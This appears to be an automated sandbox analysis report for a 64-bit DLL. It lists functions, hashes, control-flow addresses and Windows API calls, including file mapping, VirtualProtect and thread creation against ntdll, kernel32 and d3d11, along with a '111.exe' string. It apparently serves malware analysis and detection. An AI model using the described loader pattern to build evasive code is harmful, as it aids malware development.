                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2933794660-0
                                                                                                                              • Opcode ID: 28bfdc2357adf03f54329e4c108ad28d719462261268af86947824b8915ee931
                                                                                                                              • Instruction ID: 093d367e4564cb7a55d3fb0f444ae34c5d4ecb95125e018fa3c00997a91746e6
                                                                                                                              • Opcode Fuzzy Hash: 28bfdc2357adf03f54329e4c108ad28d719462261268af86947824b8915ee931
                                                                                                                              • Instruction Fuzzy Hash: 74111C22B14F0289FF00CFA4E8552B833A4FB19798F441D35DB6D467A4DF78D19A8380
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80610E8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 15204871-0
                                                                                                                              • Opcode ID: 2d2e2047d35f3442190d6e85d148a7f28d2295fafa59c9dfe8956c047c7363f1
                                                                                                                              • Instruction ID: d7ce6567d28bba8c9aab10baf13fce81b8d3dcc46696f96796684d93a544d524
                                                                                                                              • Opcode Fuzzy Hash: 2d2e2047d35f3442190d6e85d148a7f28d2295fafa59c9dfe8956c047c7363f1
                                                                                                                              • Instruction Fuzzy Hash: B9B13A77A04B898BEB15CF2DC8463687BA0F784BD8F158921DB5D87BA4CB39D462C704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B805A9D8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3da36248e075c9b782a5b1731cc43f8744fb7cb9ff5dd519b85633b362255967
                                                                                                                              • Instruction ID: c3973446d2d13028d2c6e3370e3560ae72282980e64f727732933cc191bb2499
                                                                                                                              • Opcode Fuzzy Hash: 3da36248e075c9b782a5b1731cc43f8744fb7cb9ff5dd519b85633b362255967
                                                                                                                              • Instruction Fuzzy Hash: 1951D222B0868189FF209B7AA8841AA7BA1FB447D4F144136EF5D27AD9DF3CE4439714
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B805C528 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 54951025-0
                                                                                                                              • Opcode ID: 95dc4059e565cc7797d6d9e5b553108bdfa6d30514d0eab693142d150f2f835c
                                                                                                                              • Instruction ID: d8ae1c896c9016967653ab63095d588a6cd3aae1a4ce3113f488116de0c8f77c
                                                                                                                              • Opcode Fuzzy Hash: 95dc4059e565cc7797d6d9e5b553108bdfa6d30514d0eab693142d150f2f835c
                                                                                                                              • Instruction Fuzzy Hash: 50B09224E07A03C2EE486B19AC8221422A4BF5CBC0F958038C20C41360DF3C20E79744
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8060F30 Relevance: .0, Instructions: 32COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fe177381eed61d3ab8fc280de31b0024f6de0d1e4b476a343792d2c4c1b10a67
                                                                                                                              • Instruction ID: 4939726f3fb939de2a4b1bb9992f031b217c0a4db4021b2acaa4e2952d21137c
                                                                                                                              • Opcode Fuzzy Hash: fe177381eed61d3ab8fc280de31b0024f6de0d1e4b476a343792d2c4c1b10a67
                                                                                                                              • Instruction Fuzzy Hash: BDF0FF71B296958ADBA48F2DA84262977A4FB483D4F908139D78983A54DB3C94628F08
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8051C60 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116sleepprocesssynchronizationCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$Handle$Close$CreateLibrarySleep$FreeLoadModuleObjectProcessSingleThreadWait_invalid_parameter_noinfo_noreturn
                                                                                                                              • String ID: 111.exe
                                                                                                                              • API String ID: 1744304-349209417
                                                                                                                              • Opcode ID: a3bc72be0555ec1e3eec6f4fe00b8c7dfdc57cdbefb558db517bfaf88738f4c8
                                                                                                                              • Instruction ID: c601223608bbdd66f35d82b1b0f8fb2d10f93b63c2ca7eea88db7c5767ac9699
                                                                                                                              • Opcode Fuzzy Hash: a3bc72be0555ec1e3eec6f4fe00b8c7dfdc57cdbefb558db517bfaf88738f4c8
                                                                                                                              • Instruction Fuzzy Hash: E9516232E18B8186FB00CB68E4543AD77A0FB897D8F105235DB9D02A99DF7CE186C754
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B805509C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 230 7ff8b805509c-7ff8b8055104 call 7ff8b80573fc 233 7ff8b805510a-7ff8b805510d 230->233 234 7ff8b805556b-7ff8b8055573 call 7ff8b8059784 230->234 233->234 235 7ff8b8055113-7ff8b8055119 233->235 237 7ff8b805511f-7ff8b8055123 235->237 238 7ff8b80551e8-7ff8b80551fa 235->238 237->238 242 7ff8b8055129-7ff8b8055134 237->242 240 7ff8b80554bb-7ff8b80554bf 238->240 241 7ff8b8055200-7ff8b8055204 238->241 245 7ff8b80554f8-7ff8b8055502 call 7ff8b8054620 240->245 246 7ff8b80554c1-7ff8b80554c8 240->246 241->240 243 7ff8b805520a-7ff8b8055215 241->243 242->238 244 7ff8b805513a-7ff8b805513f 242->244 243->240 247 7ff8b805521b-7ff8b8055222 243->247 244->238 248 7ff8b8055145-7ff8b805514f call 7ff8b8054620 244->248 245->234 259 7ff8b8055504-7ff8b8055523 call 7ff8b8052180 245->259 246->234 249 7ff8b80554ce-7ff8b80554f3 call 7ff8b8055a70 246->249 251 7ff8b80553ec-7ff8b80553f8 247->251 252 7ff8b8055228-7ff8b805525f call 7ff8b80533dc 247->252 248->259 263 7ff8b8055155-7ff8b8055180 call 7ff8b8054620 * 2 call 7ff8b8053b40 248->263 249->245 251->245 256 7ff8b80553fe-7ff8b8055402 251->256 252->251 268 7ff8b8055265-7ff8b805526d 252->268 260 7ff8b8055404-7ff8b8055410 call 7ff8b8053b00 256->260 261 7ff8b8055412-7ff8b805541a 256->261 260->261 274 7ff8b8055433-7ff8b805543b 260->274 261->245 267 7ff8b8055420-7ff8b805542d call 7ff8b8053220 261->267 299 7ff8b80551a0-7ff8b80551aa call 7ff8b8054620 263->299 300 7ff8b8055182-7ff8b8055186 263->300 267->245 267->274 272 7ff8b8055271-7ff8b80552a3 268->272 276 7ff8b80553df-7ff8b80553e6 272->276 277 7ff8b80552a9-7ff8b80552b4 272->277 279 7ff8b805554e-7ff8b805556a call 7ff8b8054620 * 2 call 7ff8b8059758 274->279 280 7ff8b8055441-7ff8b8055445 274->280 276->251 276->272 277->276 281 7ff8b80552ba-7ff8b80552d3 277->281 279->234 283 7ff8b8055458 280->283 284 7ff8b8055447-7ff8b8055456 call 7ff8b8053b00 280->284 285 7ff8b80553cc-7ff8b80553d1 281->285 286 7ff8b80552d9-7ff8b805531e call 7ff8b8053b14 * 2 281->286 294 7ff8b805545b-7ff8b8055465 call 7ff8b8057494 283->294 284->294 290 7ff8b80553dc 285->290 311 7ff8b805535c-7ff8b8055362 286->311 312 7ff8b8055320-7ff8b8055346 call 7ff8b8053b14 call 7ff8b8055f7c 286->312 290->276 294->245 308 7ff8b805546b-7ff8b80554b9 call 7ff8b80532ec call 7ff8b8053688 294->308 299->238 315 7ff8b80551ac-7ff8b80551cc call 7ff8b8054620 * 2 call 7ff8b8057494 299->315 300->299 305 7ff8b8055188-7ff8b8055193 300->305 305->299 307 7ff8b8055195-7ff8b805519a 305->307 307->234 307->299 308->245 319 7ff8b8055364-7ff8b8055368 311->319 320 7ff8b80553d3 311->320 330 7ff8b805536d-7ff8b80553ca call 7ff8b8054ef4 312->330 331 7ff8b8055348-7ff8b805535a 312->331 336 7ff8b80551ce-7ff8b80551d8 call 7ff8b8057584 315->336 337 7ff8b80551e3 315->337 319->286 324 7ff8b80553d8 320->324 324->290 330->324 331->311 331->312 340 7ff8b80551de-7ff8b8055547 call 7ff8b8053ca0 call 7ff8b80568c4 call 7ff8b8053e94 336->340 341 7ff8b8055548-7ff8b805554d call 7ff8b8059758 336->341 337->238 340->341 341->279
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                              • String ID: csm$csm$csm
                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                              • Opcode ID: 8172dcbc2222290ce3ae858fd587ffc1e0baa65c78c3ce550e671653fddc2da2
                                                                                                                              • Instruction ID: df884b21401b756468c92dba8d0a98b2140a41107432aaaeac40aee660531b48
                                                                                                                              • Opcode Fuzzy Hash: 8172dcbc2222290ce3ae858fd587ffc1e0baa65c78c3ce550e671653fddc2da2
                                                                                                                              • Instruction Fuzzy Hash: 3DE13972A08B428AEF209B6994812ED7BA4FB457D8F100135EB8D57B95CF38F593C718
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B805C08C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                              • Opcode ID: 0e8e577de3d814f0b34a03ae308c30c1f02f7d0ecdfd7300e03a86ebee86fd4e
                                                                                                                              • Instruction ID: 786efa0cf4601d99950befe5b7408b97772c5ddce2dfda2c21a0a2f27dc07eb4
                                                                                                                              • Opcode Fuzzy Hash: 0e8e577de3d814f0b34a03ae308c30c1f02f7d0ecdfd7300e03a86ebee86fd4e
                                                                                                                              • Instruction Fuzzy Hash: 7041CD22B19A0245FE15CB2A98942B62295BF46BE0F094135DF0D877C4EF3CF447836C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B805794C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,?,00007FF8B8057B0B,?,?,?,00007FF8B8054758,?,?,?,?,00007FF8B80541E1), ref: 00007FF8B80579D1
                                                                                                                              • GetLastError.KERNEL32(?,?,00007FF8B8057B0B,?,?,?,00007FF8B8054758,?,?,?,?,00007FF8B80541E1), ref: 00007FF8B80579DF
                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,00007FF8B8057B0B,?,?,?,00007FF8B8054758,?,?,?,?,00007FF8B80541E1), ref: 00007FF8B8057A09
                                                                                                                              • FreeLibrary.KERNEL32(?,?,00007FF8B8057B0B,?,?,?,00007FF8B8054758,?,?,?,?,00007FF8B80541E1), ref: 00007FF8B8057A4F
                                                                                                                              • GetProcAddress.KERNEL32(?,?,00007FF8B8057B0B,?,?,?,00007FF8B8054758,?,?,?,?,00007FF8B80541E1), ref: 00007FF8B8057A5B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                              • String ID: api-ms-
                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                              • Opcode ID: 6985291881791d950908a070539ecb9c8a7619c7f39a92ac89f13fc0f84199c2
                                                                                                                              • Instruction ID: c7b66a33fd41f0b7d307d78bed2e0f1919414c20cec9a2993cafefc8c1733589
                                                                                                                              • Opcode Fuzzy Hash: 6985291881791d950908a070539ecb9c8a7619c7f39a92ac89f13fc0f84199c2
                                                                                                                              • Instruction Fuzzy Hash: DC31B021A1A682C1FE15DB1AA8806BA2294BF44BE0F5A0534DF5D0A3D0EF3CF547D328
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8059D48 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2506987500-0
                                                                                                                              • Opcode ID: 22efa5df27a2c2aebb25b7aa75f66445d2f0bf004e6dddbd89be7ed53f5bfa39
                                                                                                                              • Instruction ID: ad928137421a6c8f124ea2e6896889b1944c07f24eff3ff2b66a1488e0f3c172
                                                                                                                              • Opcode Fuzzy Hash: 22efa5df27a2c2aebb25b7aa75f66445d2f0bf004e6dddbd89be7ed53f5bfa39
                                                                                                                              • Instruction Fuzzy Hash: 35214F20B0D64642FE64A76D66C61B972525F847F4F144A34DB2E076DBEF3CB4438728
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80609F4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                              • String ID: CONOUT$
                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                              • Opcode ID: 5797f7588518f0748ce8c27b37a2270eb3229d8ea4bc592b9e9a3063722dcfc9
                                                                                                                              • Instruction ID: 7199e5579813ae35b43d1f103172a83524729dcd9379aa616a6d0a79e2427df5
                                                                                                                              • Opcode Fuzzy Hash: 5797f7588518f0748ce8c27b37a2270eb3229d8ea4bc592b9e9a3063722dcfc9
                                                                                                                              • Instruction Fuzzy Hash: 3E118E31B18B4286FB50CB5AE85432962A0FB88BE4F144234EB1D877D4DF7CD8068748
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8051990 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 25librarythreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00007FF8B80511D0: GetModuleHandleA.KERNEL32 ref: 00007FF8B80512B5
                                                                                                                                • Part of subcall function 00007FF8B80511D0: K32GetModuleInformation.KERNEL32 ref: 00007FF8B80512D0
                                                                                                                                • Part of subcall function 00007FF8B80511D0: CreateFileA.KERNEL32 ref: 00007FF8B805130D
                                                                                                                                • Part of subcall function 00007FF8B80511D0: CreateFileMappingW.KERNEL32 ref: 00007FF8B8051333
                                                                                                                                • Part of subcall function 00007FF8B80511D0: MapViewOfFile.KERNEL32 ref: 00007FF8B805134E
                                                                                                                                • Part of subcall function 00007FF8B80511D0: VirtualProtect.KERNEL32 ref: 00007FF8B80513CC
                                                                                                                                • Part of subcall function 00007FF8B80511D0: VirtualProtect.KERNEL32 ref: 00007FF8B80513F9
                                                                                                                                • Part of subcall function 00007FF8B80511D0: UnmapViewOfFile.KERNEL32 ref: 00007FF8B8051414
                                                                                                                                • Part of subcall function 00007FF8B80511D0: CloseHandle.KERNEL32 ref: 00007FF8B805141D
                                                                                                                                • Part of subcall function 00007FF8B80511D0: CloseHandle.KERNEL32 ref: 00007FF8B8051426
                                                                                                                                • Part of subcall function 00007FF8B80511D0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF8B805149C
                                                                                                                                • Part of subcall function 00007FF8B80511D0: Sleep.KERNEL32 ref: 00007FF8B80514D1
                                                                                                                                • Part of subcall function 00007FF8B80511D0: LoadLibraryA.KERNEL32 ref: 00007FF8B80514DE
                                                                                                                                • Part of subcall function 00007FF8B80511D0: K32GetModuleInformation.KERNEL32 ref: 00007FF8B8051506
                                                                                                                                • Part of subcall function 00007FF8B80511D0: VirtualProtect.KERNEL32 ref: 00007FF8B805158C
                                                                                                                                • Part of subcall function 00007FF8B80511D0: VirtualProtect.KERNEL32 ref: 00007FF8B80515A6
                                                                                                                              • LoadLibraryA.KERNEL32 ref: 00007FF8B80519C1
                                                                                                                              • CreateThread.KERNEL32 ref: 00007FF8B80519E3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileProtectVirtual$CreateHandleModule$CloseInformationLibraryLoadView$MappingSleepThreadUnmap_invalid_parameter_noinfo_noreturn
                                                                                                                              • String ID: KernelBase.dll$d3d11.dll$kernel32.dll$ntdll.dll
                                                                                                                              • API String ID: 2973356570-4021381633
